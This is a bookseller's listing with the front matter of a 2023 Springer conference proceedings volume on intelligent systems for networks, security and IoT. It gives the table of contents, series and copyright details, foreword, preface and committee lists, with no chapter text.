International Conference on Advanced Intelligent Systems for Sustainable Development: Volume 2 - Advanced Intelligent Systems on Network, Security, ... (Lecture Notes in Networks and Systems) 3031352505, 9783031352508

This book describes the potential contributions of emerging technologies in different fields as well as the opportunities…




Table of contents :
Foreword
Preface
Organization
Acknowledgement
Contents
Two Levels Feature Selection Approach for Intrusion Detection System
1 Introduction
2 Related Work
3 Background on Feature Selection
4 Proposed Approach
5 Experimental Setup
6 Results and Comparative Analysis
6.1 Results and Discussion
6.2 Comparative Analysis
7 Conclusions and Future Work
References
Method of Detecting Denial of Service Attacks in WSNs While Optimizing Network Life Span
1 Introduction
2 Related Works
2.1 Protocol LEACH-EDE
2.2 Denial of Service Attack
3 Approach
3.1 Problematic
3.2 Proposed System (LTMN Protocol)
4 Conclusion
References
Numerical Investigation into the Vertical Dynamic Behavior of Railway Tracks
1 Introduction
2 Numerical Study on the Railway Tracks Dynamic Response
3 Validation of the Calculation Results
4 The Dynamic Properties of the Non-ballasted Railway Track
5 Conclusion
References
A Lightweight, Multi-layered Internet Filtering System
1 Introduction
2 Internet Filtering Methods
3 Problematic
4 Project Presentation
4.1 Filtering Equipment
4.2 Servers on the Cloud
4.3 The Mobile Control Application
5 The Filtering Process
5.1 The Web Filtering Module
5.2 The Service Filtering Module
5.3 The Filtering Module of an Application
6 The Deployment of the Solution
7 Conclusion
Tracking Methods: Comprehensive Vision and Multiple Approaches
1 Introduction
2 Elucidation Tracking
3 Related Work
4 Analysis and Discussion
5 Conclusion and Future Work
References
Multi-blockchain Scheme Based on IoT and Smart Contracts in the Agricultural Field for Data Management
1 Introduction
2 Previous Work
3 The Proposed Architecture
4 Conclusion
References
A Geometry-Based Analytical Model for Vehicular Visible Light Communication Channels
1 Introduction
1.1 Related Works
2 System Model
2.1 Atmospheric Attenuation ha
2.2 The Geometrical Propagation Path Loss hg
3 Simulation Results and Analysis
4 Conclusion
References
Mapping Review of Research on Supply Chains Relocation
1 Introduction
2 Different Business Strategies Related To SCM
3 Definition of Relocation in Literature
3.1 Existing Definitions of Relocation
3.2 Types of Relocation
4 Motivations Behind Relocation Across Literature
5 Literature Review: Dimensions of the Relocation Decision Model and Its Different Variables
5.1 Mapping Review of Supply Chains Relocation
5.2 Mapping Strategy
5.3 Yearly Contribution Trend and Main Authors
5.4 Subject Area and Fields of Research
5.5 Geographical Position and Contributing Affiliations
6 Financial Factors in SCRM
7 Conclusion
References
A Predictive Maintenance System Based on Vibration Analysis for Rotating Machinery Using Wireless Sensor Network (WSN)
1 Introduction
2 Predictive Maintenance for Rotating Machinery
2.1 Concept and Functioning of the Predictive Maintenance (PdM)
2.2 Predictive Maintenance Technologies
2.3 Predictive Maintenance - Process (CBM-PHM)
3 Detection, Diagnosis, and Prognosis for Rotating Machinery
3.1 Detecting Faults of Rotating Machines
3.2 Commonly Witnessed Machinery Faults Diagnosed by Vibration Analysis
3.3 Vibration Signal Analysis and Measurement
3.4 The Accelerometer Sensor
3.5 Classification of Diagnostic Methods
4 Wireless Sensor Network (WSN)
5 Results and Discussions
6 Conclusion and Perspectives
References
A Comparative Study of Vulnerabilities Scanners for Web Applications: Nexpose vs Acunetix
1 Introduction
2 Description of XSS, SQL Injection (Second Order) and CSRF
2.1 Cross Site Scripting (XSS)
2.2 SQL Injection (Second-Order)
2.3 CSRF (Cross-Site Request Forgery)
3 Penetration Testing Concept
3.1 Acunetix
3.2 Nexpose
4 Application and Comparison
4.1 Proposed Architecture
4.2 Benchmarking
5 Conclusion
References
The Pulse-Shaping Filter Influence over the GFDM-Based System
1 Introduction
2 System Model-Based OFDM
3 System Model-Based GFDM
3.1 GFDM Transmitter
3.2 GFDM Receiver
3.3 Rectangular Filter
3.4 Raised-Cosine (RC)
3.5 Root Raised-Cosine (RRC)
4 Numerical Results
4.1 The Impact of the Designed Pulse-Shaping Filter
4.2 Influence of the Number of Sub-carriers
5 Conclusion
References
Intrusion Detection Systems in Internet of Things Using Machine Learning Algorithms: A Comparative Study
1 Introduction
2 Relevant Terms
2.1 Intrusion Detection System
2.2 Internet of Things
2.3 Machine Learning
3 Preliminary
3.1 The Algorithms Used
3.2 The Parameters Used
3.3 The Dataset Used
4 Experiment
4.1 Experiment Setup
4.2 Results and Discussion
5 Conclusion
References
Generative Adversarial Networks for IoT Devices and Mobile Applications Security
1 Introduction
2 Mobile Applications' Vulnerabilities
3 Solutions for Protecting Mobile Applications
3.1 Hardware Level Protections
3.2 Generative Adversarial Networks for Software Level Protection
4 Conclusion and Perspectives
References
The Indoor Localization System Based on Federated Learning and RSS Using UWB-OFDM
1 Introduction
2 Indoor Localization Based on Federated Learning FL and RSS Method
3 Evaluation of Results
3.1 System Parameters
3.2 Simulation Setup
3.3 Discussion
4 Tools Performance
5 Conclusion
References
Artificial Intelligence for Smart Decision-Making in the Cities of the Future
1 Introduction
2 Proposed Methodology
2.1 Formal Concept Analysis
2.2 Concept Lattices
2.3 Data Extraction Environment
3 Results and Discussion
4 Conclusion and Perspectives
References
Performance Comparison of Localization Techniques in Term of Accuracy in Wireless Sensor Networks
1 Introduction
2 Wireless Sensor Network (WSN)
3 Localization Algorithm
3.1 Range-Based Technique
3.2 Range-Free Technique
4 Simulation and Results
4.1 Placement Model
4.2 System Parameters
4.3 Results
5 Conclusion and Future Works
References
Fog Computing Model Based on Queuing Theory
1 Introduction
2 Vehicular Fog Computing Architecture
3 Model Description
4 Problem Analytical Model
4.1 The Mobile and Static Fog Nodes Models
4.2 QoS Performance Parameters
5 Numerical Results
6 Discussion
7 Conclusion
References
From Firewall and Proxy to IBM QRadar SIEM
1 Introduction
2 SIEM IBM QRADAR
References
IoT-Based Approach for Wildfire Monitoring and Detection
1 Introduction
2 Background
2.1 Internet of Things
2.2 Sensors
2.3 LoRaWAN
2.4 ESP32
2.5 MQTT
3 Related Work
4 Proposed Methodology
4.1 Proposed Prototype
5 Results and Discussions
6 Conclusion
References
A Decision-Making Model Based on a High-Level Ontology in Context of a Smart Home
1 Introduction
2 Ontology Context and Smart Home
3 Related Work
4 Proposed Model
5 Conclusion
References
Integration of the Human Factor in the Management and Improvement of Performance of Production Systems: An Exploratory Literature Review
1 Introduction
2 Industry 4.0: Overview from History
2.1 Web and Mobile Applications
2.2 3D Printing
2.3 Internet of Things (IoT)
2.4 Cloud Computing
3 Human Factors
4 Literature Review
5 Challenges of Human Factor
6 Challenges of New Technologies
7 Analysis and Discussions
8 Conclusions
References
Securing Caesar Cryptography Using the 2D Geometry
1 Introduction
2 Related Work
3 Proposed Method
3.1 Explanation of the Method
3.2 Encryption Process
3.3 Decryption Process
4 Resistance Against Attacks
4.1 Brute Force Attack
4.2 Frequency Analysis Attack
5 Experimentation
5.1 Encrypting the Original Text
5.2 Securing the Text with the Proposed Algorithm
5.3 Decryption of the Received Text
6 Conclusion
References
A Comparative Study of Neural Networks Algorithms in Cyber-Security to Detect Domain Generation Algorithms Based on Mixed Classes of Data
1 Introduction
2 Domain Generation Algorithms
2.1 DGA Structures and Types
2.2 DGAs Features
3 Neural Network Methods to Detect DGAs
3.1 Data Collection
3.2 Architectures of the Compared Models
4 Evaluation
4.1 Implementation Details
4.2 Results
5 Conclusion and Future Works
References
A Literature Review of Digital Technologies in Supply Chains
1 Introduction
2 Literature Review and Background
2.1 Digital Technologies of the Supply Chain
3 Methodological Procedures
4 Results and Discussions
5 Conclusion
References
IoT Systems Security Based on Deep Learning: An Overview
1 Introduction
2 IoT Security Threats Per Layer
3 History of IoT Security Attacks
4 Deep Learning and IoT Security
5 Conclusion
References
Deep Learning for Intrusion Detection in WoT
1 Introduction
2 Related Work
3 Proposed Work
4 Conclusion
References
Artificial Intelligence Applications in the Global Supply Chain: Benefits and Challenges
1 Introduction
2 Understanding of Artificial Intelligence Technology
2.1 Definition and History
2.2 Enabling Drivers and Technologies of Artificial Intelligence
3 Benefits of Artificial Intelligence in Supply Chain Management
3.1 Artificial Intelligence and Forecast Demand Optimization
3.2 Artificial Intelligence Between Manufacturing and Smart Manufacturing
3.3 Artificial Intelligence and Warehousing
3.4 Artificial Intelligence and Distribution
4 Artificial Intelligence Risks and Challenges
5 Conclusion
References
Fault Detection and Diagnosis in Condition-Based Predictive Maintenance
1 Introduction
2 Terminology and Concepts
2.1 Fault, Failure, and Malfunction
2.2 Predictive Maintenance and Condition Monitoring
2.3 Fault Detection, Diagnosis, and Prognosis
3 Machine Fault Diagnosis
3.1 Model-Based Approach
4 Conclusion and Future Research
References
Agile Practices in Iteration Planning Process of Global Software Development
1 Introduction
2 Background and Related Work
2.1 Challenges of Global Software Development Projects
2.2 Iteration Planning in Software Development Project
3 Iteration Planning in GSD: Activities and Repositories
3.1 Iteration Planning in GSD Project: Activities
3.2 Iteration Planning Repositories
4 Conclusion
References
Sensitive Infrastructure Control Systems Cyber-Security: Literature Review
1 Introduction
2 An Overview of Cyber-Security
2.1 Cyber-Security
2.2 Cyber-Attacks
2.3 Cyber-Defense
2.4 Impact of Cyber-Attacks
2.5 Consequences of Cyber-Attacks
3 Critical Infrastructures
4 Research Perspectives
4.1 Social Dimension
4.2 Political Dimension
4.3 Technical Dimension
5 Conclusion
References
Design of SCMA Codebook Based on QAM Segmentation Constellation
1 Introduction
2 System Model
3 Sparse Mapping Matrix F with PEG
4 SCMA Codebook Design
4.1 Mother Constellation - MC
4.2 Sub-constellation Generation with MED Maximization
4.3 SCMA Codebook Generation by Sub-constellation Mapping with MED Maximization
5 Design Example
6 Numerical Results and Analysis
7 Conclusion
References
Towards an Optimization Model for Outlier Detection in IoT-Enabled Smart Cities
1 Introduction
2 Related Work
2.1 IoT Paradigm: Definition, Layers and Enabling Technologies
2.2 Data Quality: Definition, Dimensions and Issues
2.3 Outlier Detection: Definition and Techniques
3 Towards a Model for Outlier Detection in IoT-Enabled Smart Cities
3.1 Data Quality for Geolocation Services
3.2 Recommended Method for OD
4 Conclusion
References
Performance Analysis of Static and Dynamic Clustering Protocols for Wireless Sensor Network
1 Introduction
2 Energy Consumption Model
3 Energy Consumed in Dynamic Clustering (Set-Up Phase)
4 Energy Consumed in Static Clustering
5 Experiments and Results
5.1 Comparison of Network Lifetime
5.2 Comparison of the Energy Consumption
5.3 Comparison of the Data Received by the Base Station
6 Conclusion
References
A Comprehensive Study of Integrating AI-Based Security Techniques on the Internet of Things
1 Introduction
2 Related Works
3 Overview of the Internet of Things (IoT) and Security Threats
3.1 IoT Overview
3.2 Challenges of the Emerging IoT Networks
3.3 Security Threats in IoT Networks
4 AI-Based Methods for IoT Security
5 Open Challenges and Future Research Opportunities
6 Conclusion
References
Semantic Segmentation Architecture for Text Detection with an Attention Module
1 Introduction
2 Related Works
3 The Proposed Method
3.1 Architecture
3.2 Attention Block
3.3 Loss
4 Experiments
5 Results
5.1 Quantitative Results
5.2 Qualitative Results
6 Conclusion
References
Car Damage Detection Based on Mask Scoring RCNN
1 Introduction
2 Related Work
3 Proposed Method
3.1 Mask Scoring RCNN
3.2 Transfer Learning
4 Results and Discussion
4.1 Dataset
4.2 Training Platform
4.3 Evaluation Metric
4.4 Results
4.5 Comparison with Mask RCNN
5 Conclusion
References
Blockchain and IoT for Real-Time Decision Support for the Optimization of Maritime Freight Transport Networks
1 Introduction
1.1 Big Data, Blockchain and Internet of Things as Solution for Logistics and Freight Transportation Problems
1.2 Overview of the Concept of Big Data
2 Big Data and IoT Technologies in Maritime Freight Transportation
2.1 Smart Containers
3 Adoption of Blockchain in Maritime Freight Transportation
3.1 What is Blockchain?
3.2 Problematic Solved by Blockchain Technology
4 What is Blockchain’s Value Proposition in Maritime Freight Transportation?
4.1 Smart Contracts
5 A Model for Using Blockchain Transaction Process
6 Maritime Freight Transportation
7 Conclusion
References
MQTT Protocol Analysis According to QoS Levels and SSL Implementation for IoT Systems
1 Introduction
2 Related Work
3 Background
3.1 MQTT
3.2 Quality of Service (QoS)
4 Experimental Study and Results
4.1 MQTT Analysis Without Security
4.2 MQTT Analysis with Security Implemented
5 Results and Discussion
6 Conclusion
References
New Analytical Method to Classify Areas According to Signal Quality and Coverage of GSM Network
1 Introduction
2 Related Work
2.1 Evaluation of the Signal Strength of the Mobile Network for GSM Networks in Gusau, in the State of Zamfara
2.2 Comparison Between the Different Operators
3 Collection of Data via the Application
3.1 Development of a Mobile Application
3.2 The Areas Concerned
4 The Proposed Algorithm
4.1 The Flood Filling Algorithm
4.2 Program Code
5 Proposed Solution
5.1 Presented Nodes via Signal Strength Level on Relevant Areas
5.2 Presents Problem Areas via the Flood Algorithm
5.3 Model Architecture
6 Analysis of the Signal According to the Environment of Each Zone
7 Conclusion
References
Neural Network Feature-Based System for Real-Time Road Condition Prediction
1 Introduction
2 Related Works
3 Proposed Solution
4 Conclusion
References
Author Index

Lecture Notes in Networks and Systems 712

Janusz Kacprzyk Mostafa Ezziyyani Valentina Emilia Balas   Editors

International Conference on Advanced Intelligent Systems for Sustainable Development Volume 2 - Advanced Intelligent Systems on Network, Security, and IoT Applications

Lecture Notes in Networks and Systems

712

Series Editor Janusz Kacprzyk, Systems Research Institute, Polish Academy of Sciences, Warsaw, Poland

Advisory Editors Fernando Gomide, Department of Computer Engineering and Automation—DCA, School of Electrical and Computer Engineering—FEEC, University of Campinas—UNICAMP, São Paulo, Brazil Okyay Kaynak, Department of Electrical and Electronic Engineering, Bogazici University, Istanbul, Türkiye Derong Liu, Department of Electrical and Computer Engineering, University of Illinois at Chicago, Chicago, USA Institute of Automation, Chinese Academy of Sciences, Beijing, China Witold Pedrycz, Department of Electrical and Computer Engineering, University of Alberta, Alberta, Canada Systems Research Institute, Polish Academy of Sciences, Warsaw, Poland Marios M. Polycarpou, Department of Electrical and Computer Engineering, KIOS Research Center for Intelligent Systems and Networks, University of Cyprus, Nicosia, Cyprus Imre J. Rudas, Óbuda University, Budapest, Hungary Jun Wang, Department of Computer Science, City University of Hong Kong, Kowloon, Hong Kong

The series “Lecture Notes in Networks and Systems” publishes the latest developments in Networks and Systems—quickly, informally and with high quality. Original research reported in proceedings and post-proceedings represents the core of LNNS. Volumes published in LNNS embrace all aspects and subfields of, as well as new challenges in, Networks and Systems. The series contains proceedings and edited volumes in systems and networks, spanning the areas of Cyber-Physical Systems, Autonomous Systems, Sensor Networks, Control Systems, Energy Systems, Automotive Systems, Biological Systems, Vehicular Networking and Connected Vehicles, Aerospace Systems, Automation, Manufacturing, Smart Grids, Nonlinear Systems, Power Systems, Robotics, Social Systems, Economic Systems and other. Of particular value to both the contributors and the readership are the short publication timeframe and the world-wide distribution and exposure which enable both a wide and rapid dissemination of research output. The series covers the theory, applications, and perspectives on the state of the art and future developments relevant to systems and networks, decision making, control, complex processes and related areas, as embedded in the fields of interdisciplinary and applied sciences, engineering, computer science, physics, economics, social, and life sciences, as well as the paradigms and methodologies behind them. Indexed by SCOPUS, INSPEC, WTI Frankfurt eG, zbMATH, SCImago. All books published in the series are submitted for consideration in Web of Science. For proposals from Asia please contact Aninda Bose ([email protected]).

Janusz Kacprzyk · Mostafa Ezziyyani · Valentina Emilia Balas Editors

International Conference on Advanced Intelligent Systems for Sustainable Development Volume 2 - Advanced Intelligent Systems on Network, Security, and IoT Applications

Editors Janusz Kacprzyk Polish Academy of Sciences Systems Research Institute Warsaw, Poland

Mostafa Ezziyyani Abdelmalek Essaâdi University Tangier, Morocco

Valentina Emilia Balas Department of Automatics and Applied Software Aurel Vlaicu University of Arad Arad, Romania

ISSN 2367-3370 ISSN 2367-3389 (electronic) Lecture Notes in Networks and Systems ISBN 978-3-031-35250-8 ISBN 978-3-031-35251-5 (eBook) https://doi.org/10.1007/978-3-031-35251-5 © The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed. The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication does not imply, even in the absence of a specific statement, that such names are exempt from the relevant protective laws and regulations and therefore free for general use. The publisher, the authors, and the editors are safe to assume that the advice and information in this book are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or the editors give a warranty, expressed or implied, with respect to the material contained herein or for any errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional claims in published maps and institutional affiliations. This Springer imprint is published by the registered company Springer Nature Switzerland AG The registered company address is: Gewerbestrasse 11, 6330 Cham, Switzerland

Foreword

Within the framework of the international initiative for the sustainable development of innovation and scientific research, and in order to keep pace with the digital transformation brought by the fourth industrial revolution and to encourage development projects worldwide, ENSAM-Rabat of Mohammed V University, in cooperation with ICESCO, organized the fourth edition of the International Conference on Advanced Intelligent Systems for Sustainable Development and its applications in various fields, through five specialized seminars held from May 22 to 28, 2022. The fourth edition of the conference was a great success, held under the high patronage of His Majesty King Mohammed VI of Morocco and with the participation of scientists and experts from more than 36 countries around the world. This edition also resulted in a set of agreements and partnerships signed between the various participating parties, contributing to the goals set by the conference regarding the use of intelligent systems for sustainable development in the sectors of education, health, environment, agriculture, industry, energy, economy, and security. In view of the importance of the conference as a high-level annual forum, of the scientific standing it enjoys nationally, continentally, and internationally, and of the experience accumulated through the previous editions, we look forward to the next edition being as successful as its predecessors at all organizational and scientific levels, and to hosting distinguished guests and leading figures from all participating countries in order to advance cooperation in priority areas of common interest such as health, agriculture, energy, and industry.

Preface

Science, technology, and innovation have long been recognized as main drivers of productivity gains and as a key long-term lever for economic growth and prosperity. In this context, the International Conference on Advanced Intelligent Systems for Sustainable Development (AI2SD) plays an even more central role. AI2SD relates strongly to the Sustainable Development Goals across different fields and acts as a cross-cutting forum for achieving several sectoral goals and targets: agriculture, energy, health, environment, industry, education, economy, and security. The ambition of AI2SD to become a global forerunner of sustainable development entails, in particular, integrating new technologies, artificial intelligence, and smart systems into its overarching and sectoral research and development strategies, with the conviction that the solutions discussed by experts are important drivers for research and development. AI2SD is an interdisciplinary international conference that invites academics, independent scholars, and researchers from around the world to meet, exchange the latest ideas, and discuss technological issues across all fields, including the social sciences and humanities, for sustainable development. Given the conference's focus on innovative ideas and developments, AI2SD provides an ideal opportunity to bring together professors, researchers, and higher education students from different disciplines to discuss new issues and discover the most recent developments and scientific research, through panel discussions on advanced technologies and intelligent systems for sustainable development applied to education, agriculture, energy, health, environment, industry, economy, and security.

Organization

Chairs

General Chairs
Mostafa Ezziyyani, Abdelmalek Essaadi University, FST – Tangier, Morocco
Janusz Kacprzyk, Polish Academy of Sciences, Poland
Valentina Emilia Balas, Aurel Vlaicu University of Arad, Romania

Co-chairs
Khalid El Bikri, ENSAM Rabat, Morocco
Wajih Rhalem, ENSAM Rabat, Morocco
Loubna Cherrat, ENCG of Tangier, Morocco
Omar Halli, Advisor to the Director General of ICESCO

Honorary Presidents
Salim M. Almalik, Director General (DG) of the Islamic World Educational, Scientific and Cultural Organization (ICESCO)
Abdellatif Miraoui, Minister of Higher Education, Scientific Research and Professional Training of Morocco
Younes Sekkouri, Minister of Economic Inclusion, Small Business, Employment and Skills
Ghita Mezzour, Minister Delegate to the Head of Government in Charge of Digital Transition and Administration Reform

Honorary Guests
Thomas Druyen, Director and Founder of the Institute for Future Psychology and Future Management, Sigmund Freud University
Jochen Werner, Medical Director and CEO, Medicine University of Essen, Germany


Ibrahim Adam Ahmed El-Dukheri, Director General of the Arab Organization for Agricultural Development
Stéphane Monney Mouandjo, Director General of CAFRAD
Jamila El Alami, Director of the CNRST, Rabat, Morocco
Mostapha Bousmina, President of the EuroMed University of Fez, Fez, Morocco
Chakib Nejjari, President of the Mohammed VI University of Health Sciences, Casablanca, Morocco
Noureddine Mouaddib, President of the International University of Rabat, Rabat, Morocco
Azzedine Elmidaoui, President of Ibn Tofail University, Kenitra, Morocco
Lahcen Belyamani, President of the Moroccan Society of Emergency Medicine, SAMU, Rabat, Morocco
Karim Amor, President of Moroccan Entrepreneurs and High Potentials of the World-CGEM
Hicham El Abbadi, Business Sales Manager, Afrique Francophone, EPSON
Ilham Berrada, Director of ENSIAS, Rabat, Morocco
Mostafa Stito, Director of the ENSA of Abdelmalek Essaadi University, Tetouan, Morocco
Mohamed Addou, Dean of FST Tangier, Morocco
Ahmed Maghni, Director of ENCG Tangier, Morocco

Keynote Speakers
Chakib Nejjari, President of the Mohammed VI University of Health Sciences, Casablanca, Morocco
Anas Doukkali, Former Minister of Health, Morocco
Thomas Druyen, Director and Founder of the Institute for Future Psychology and Future Management, Sigmund Freud University
Jochen Werner, Medical Director and CEO, Medicine University of Essen, Germany
Abdelhamid Errachid El Salhi, Full Professor, Exceptional Class, University Claude Bernard, Lyon, France
Oussama Barakat, University of Franche-Comté, Besançon, France
Fatima Zahra Alaoui, Dean of the Faculty of Medicine of Laâyoune, Morocco
Issame Outaleb, CEO and Founder, PharmaTrace, Munich, Germany
Rachid Yazami, Scientist, Engineer and Inventor, Morocco
Tarkan Gürbüz, Middle East Technical University (METU), Ankara, Turkey
Plamen Kiradjiev, German Edge Cloud (GEC), Friedhelm Loh Group, Germany
Abdel Labbi, Head of Data & AI Platforms Research, IBM Distinguished Engineer, IBM Research – Europe
Mostafa Ezziyyani, FST – Tangier, Morocco
Ghizlane Bouskri, Senior Data Scientist at Volkswagen Group, Germany
Levent Trabzon, Mechanical Engineering, Istanbul Technical University, Turkey
Marius M. Balas, Aurel Vlaicu University of Arad
Afef Bohli, Assistant Professor at the Higher Institute of Computer Science and Co-founder of Digi Smart Solutions
Ahmed Allam (President), World Association for Sustainable Development, Senior Policy Fellow, Queen Mary University of London, UK
Valentina Emilia Balas, Aurel Vlaicu University of Arad, Romania
Faissal Sehbaoui, CEO of AgriEDGE, attached to the Mohammed VI Polytechnic University
Jaime Lloret, Department of Communications, Polytechnic University of Valencia, Spain
Hanan Melkaoui Issa Mouhamed, Yarmouk University, Irbid, Jordan
Hossana Twinomurinzi, Head, Centre for Applied Data Science, University of Johannesburg, South Africa
Abdelhafid Debbarh, Chief of Staff/Advisor to the President, UIR
Hatim Rhalem, EPSON Sales Manager, Morocco
Faeiz Gargouri (Vice President), University of Sfax, Tunisia
Adil Boushib, Regional Manager, Microsoft, Germany
Nasser Kettani, Entrepreneur, ExO Coach, Digital Transformation Expert, Exponential Thinker, Certified DPO, Accessibility Expert
Kaoutar El Menzhi, Head of Digital Learning Center UM5R, Morocco
Khairiah Mohd-Yusof (President), Johor Bahru, Johor, Malaysia
Nadja Bauer, Dortmund, Germany
Badr Ikken, General Director of IRESEN, Rabat, Morocco
Amin Bennouna, Cadi Ayyad University, Marrakech, Morocco
Mohamed Essaaidi, ENSIAS, Mohammed V University, Rabat, Morocco
Hamid Ouadia, ENSAM, Mohammed V University, Rabat, Morocco

Khalid Zinedine, Faculty of Sciences, Mohammed V University, Rabat, Morocco
Brahim Benaji, ENSAM, Mohammed V University, Rabat, Morocco
Youssef Taher, Center of Guidance and Planning of Education, Morocco
Tarik Chafik, FST, Abdelmalek Essaadi University, Tangier, Morocco
Abdoulkader Ibrahim Idriss, Dean of Faculty of Engineering, University of Djibouti, Djibouti
Loubna Cherrat, Abdelmalek Essaadi University, Morocco
Laila Ben Allal, FST, Abdelmalek Essaadi University, Morocco
Najib Al Idrissi, Mohammed VI University of Health Sciences, General Secretary of the Moroccan Society of Digital Health, Morocco
Hassan Ghazal, President of the Moroccan Association of Telemedicine and E-Health, Morocco
Muhammad Sharif, Director and Founder of Advisor/Science and Technology at ICESCO
Mounir Lougmani, General Secretary of the Association of German Moroccan Friends-DMF
El Hassan Abdelwahid, Cadi Ayyad University, Marrakech, Morocco
Mohamed Zeriab Es-Sadek, ENSAM, Mohammed V University, Rabat, Morocco
Mustapha Mahdaoui, FST, Abdelmalek Essaadi University, Morocco
M'Hamed Ait Kbir, Abdelmalek Essaadi University, Morocco
Mohammed Ahachad, Abdelmalek Essaadi University, Morocco

Course Leaders
Adil Boushib, Regional Manager, Microsoft, Germany
Ghizlane Bouskri, Senior Data Scientist at Volkswagen Group, Germany
Nadja Bauer, Dortmund, Germany
Hassan Moussif, Deutsche Telekom expert, Germany; General Director and Founder of M-tech
Abdelmounaim Fares, Co-Founder and Chief Executive Officer, Guard Technology, Germany
Imad Hamoumi, Senior Data Scientist Engineer, Germany
Ghizlane Sbai, Product Owner, Technical Solution Owner at Pro7Sat1


Scientific Committee Christian Axiak, Malta Bougdira Abdeslam, Morocco Samar Kassim, Egypt Vasso Koufi, Greece Alberto Lazzero, France Charafeddine Ait Zaouiat, Morocco Mohammed Merzouki, Morocco Pedro Mauri, Spain Sandra Sendra, Spain Lorena Parra, Spain Oscar Romero, Spain Kayhan Ghafoor, China Jaime Lloret Mauri, Spain Yue Gao, UK Faiez Gargouri, Tunis Mohamed Turki, Tunis Abdelkader Adla, Algeria Souad Taleb Zouggar, Algeria El-Hami Khalil, Morocco Bakhta Nachet, Algeria Danda B. Rawat, USA Tayeb Lemlouma, France Mohcine Bennani Mechita, Morocco Tayeb Sadiki, Morocco Mhamed El Merzguioui, Morocco Abdelwahed Al Hassan, Morocco Mohamed Azzouazi, Morocco Mohammed Boulmalf, Morocco Abdellah Azmani, Morocco Kamal Labbassi, Morocco Jamal El Kafi, Morocco Dahmouni Abdellatif, Morocco Meriyem Chergui, Morocco El Hassan Abdelwahed, Morocco Mohamed Chabbi, Morocco Mohamed_Riduan Abid, Morocco Jbilou Mohammed, Morocco Salima Bourougaa-Tria, Algeria Zakaria Bendaoud, Algeria Noureddine En-Nahnahi, Morocco Mohammed Bahaj, Morocco Feddoul Khoukhi, Morocco Ahlem Hamdache, Morocco


Mohammed Reda Britel, Morocco Houda El Ayadi, Morocco Youness Tabii, Morocco Mohamed El Brak, Morocco Abbou Ahmed, Morocco Elbacha Abdelhadi, Morocco Regragui Anissa, Morocco Samir Ahid, Morocco Anissa Regragui, Morocco Frederic Lievens, Belgium Emile Chimusa, South Africa Abdelbadeeh Salem, Egypt Mamadou Wele, Mali Cheikh Loukobar, Senegal Najeeb Al Shorbaji, Jordan Sergio Bella, Italy Siri Benayad, Morocco Mourad Tahajanan, Morocco Es-Sadek M. Zeriab, Morocco Wajih Rhalem, Morocco Nassim Kharmoum, Morocco Azrar Lahcen, Morocco Loubna Cherrat, Morocco Soumia El Hani, Morocco Essadki Ahmed, Morocco Hachem El Yousfi Alaoui, Morocco Jbari Atman, Morocco Ouadi Hamid, Morocco Tmiri Amal, Morocco Malika Zazi, Morocco Mohammed El Mahi, Morocco Jamal El Mhamdi, Morocco El Qadi Abderrahim, Morocco Bah Abdellah, Morocco Jalid Abdelilah, Morocco Feddi Mustapha, Morocco Lotfi Mostafa, Morocco Larbi Bellarbi, Morocco Mohamed Bennani, Morocco Ahlem Hamdache, Morocco Mohammed Haqiq, Morocco Abdeljabbar Cherkaoui, Morocco Rafik Bouaziz, Tunis Hanae El Kalkha, Morocco Hamid Harroud, Morocco


Joel Rodrigues, Portugal Ridda Laaouar, Algeria Mustapha El Jarroudi, Morocco Abdelouahid Lyhyaoui, Morocco Nasser Tamou, Morocco Bauer Nadja, Germany Peter Tonellato, USA Keith Crandall, USA Stacy Pirro, USA Tatiana Tatusova, USA Yooseph Shibu, USA Yunkap Kwankam, Switzerland Frank Lievens, Belgium Kazar Okba, Algeria Omar Akourri, Morocco Pascal Lorenz, France Puerto Molina, Spain Herminia Maria, Spain Driss Sarsri, Morocco Muhannad Quwaider, India Mohamed El Harzli, Morocco Wafae Baida, Morocco Mohammed Ezziyyani, Morocco Xindong Wu, China Sanae Khali Issa, Morocco Monir Azmani, Morocco El Metoui Mustapha, Morocco Mustapha Zbakh, Morocco Hajar Mousannif, Morocco Mohammad Essaaidi, Morocco Amal Maurady, Morocco Ben Allal Laila, Morocco Ouardouz Mustapha, Morocco Mustapha El Metoui Morocco Said Ouatik El Alaoui, Morocco Lamiche Chaabane, Algeria Hakim El Boustani, Morocco Azeddine Wahbi, Morocco Nfaoui El Habib, Morocco Aouni Abdessamad, Morocco Ammari Mohammed, Morocco El Afia Abdelatif, Morocco Noureddine En-Nahnahi, Morocco Zakaria Bendaoud, Algeria Boukour Mustapha, Morocco


El Maimouni Anas, Morocco Ziani Ahmed, Morocco Karim El Aarim, Morocco Imane Allali, Morocco Mounia Abik, Morocco Barrijal Said, Morocco Mohammed V., Rabat, Morocco Franccesco Sicurello, Italy Bouchra Chaouni, Morocco Charoute Hicham, Morocco Zakaria Bendaoud, Algeria Ahachad Mohammed, Morocco Abdessadek Aaroud, Morocco Mohammed Said Riffi, Morocco Abderrahim Abenihssane, Morocco Abdelmajid El Moutaouakkil, Morocco Silkan, Morocco Khalid El Asnaoui, France Salwa Belaqziz, Morocco Khalid Zine-Dine, Morocco Ahlame Begdouri, Morocco Mohamed Ouzzif, Morocco Essaid Elbachari, Morocco Mahmoud Nassar, Morocco Khalid Amechnoue, Morocco Hassan Samadi, Morocco Mohammed Yahyaoui, Morocco Hassan Badir, Morocco Ezzine Abdelhak, Morocco Mohammed Ghailan, Morocco Kaoutar Elhari, Morocco Mohammed El M’rabet, Morocco El Khatir Haimoudi, Morocco Mounia Ajdour, Morocco Lazaar Saiida, Morocco Mehdaoui Mustapha, Morocco Zoubir El Felsoufi, Morocco Khalil El Hami, Morocco Yousef Farhaoui, Morocco Mohammed Ahmed Moammed Ail, Sudan Abdelaaziz El Hibaoui, Morocco Othma Chakkor, Morocco Abdelali Astito, Morocco Mohamed Amine Boudia, Algeria Mebarka Yahlali, Algeria


Hasna Bouazza, Algeria Zakaria Bendaoud, Algeria Naila Fares, Spain Brahim Aksasse, Morocco Mustapha Maatouk, Morocco Abdel Ghani Laamyem, Morocco Abdessamad Bernoussi, Morocco


Acknowledgement

